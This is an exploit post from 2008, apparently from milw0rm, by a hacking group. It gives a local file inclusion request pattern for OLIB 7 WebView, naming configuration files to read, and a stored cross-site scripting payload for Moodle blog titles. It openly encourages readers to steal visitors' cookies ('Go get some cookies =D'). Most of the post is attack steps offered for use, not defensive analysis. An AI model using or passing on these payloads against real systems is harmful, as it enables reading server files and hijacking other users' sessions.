49 lines
No EOL
825 B
Text
49 lines
No EOL
825 B
Text
Security Advisory for 'OLIB 7 Webview'
|
|
|
|
This software is apart of Moodle.
|
|
|
|
Software - OLIB 7 WebView v2.5.1.1
|
|
Exploit - LFI
|
|
Severity - High
|
|
Author - ZeN
|
|
website - http://dusecurity.com/
|
|
Date - 2nd October 2008
|
|
|
|
DUSecurity Team / DarkCode
|
|
|
|
|
|
Exploit >
|
|
|
|
http://olib.site.com/cgi/?session=[session_key]&infile=[LFI]
|
|
|
|
files in dir - get_settings.ini, setup.ini(contains config file locations), text.ini
|
|
|
|
|
|
Info - You need to login to get a valid session key.
|
|
|
|
|
|
------------------
|
|
Extraz :
|
|
|
|
Moodle Permanent XSS
|
|
|
|
In Moodle blogging system, simply make a new blog entry with the title
|
|
|
|
<script>alert()</script>
|
|
|
|
Now everyone that visits the bloggins system with execute your XSS.
|
|
Go get some cookies =D
|
|
|
|
Enjoy!
|
|
|
|
------------------
|
|
|
|
|
|
Shouts :-
|
|
DUSecurity.com
|
|
DarkCode.me
|
|
Milw0rm.com
|
|
iWannaHack
|
|
WL-Group
|
|
|
|
# milw0rm.com [2008-10-02] |